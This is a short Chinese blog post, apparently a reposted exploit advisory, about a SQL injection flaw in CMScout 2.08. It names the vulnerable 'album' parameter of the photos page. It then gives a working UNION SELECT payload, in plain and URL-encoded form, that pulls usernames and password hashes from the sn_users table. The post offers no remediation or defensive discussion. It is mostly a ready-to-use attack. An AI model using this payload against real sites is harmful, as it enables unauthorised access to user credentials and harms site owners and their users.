CMScout 2.08脚本注入漏洞

首页 » 技术文章 » CMScout 2.08脚本注入漏洞

2010/04/27 9:08 | 教主 | 技术文章 | 占个座先

作者:Dr.0rYX and Cr3w-DZ
注入点

http://server/index.php?page=photos&album=[N.A.S.T ]

利用方法

http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--

示例

http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--

Tags: 漏洞, 脚本注入

教主's Blog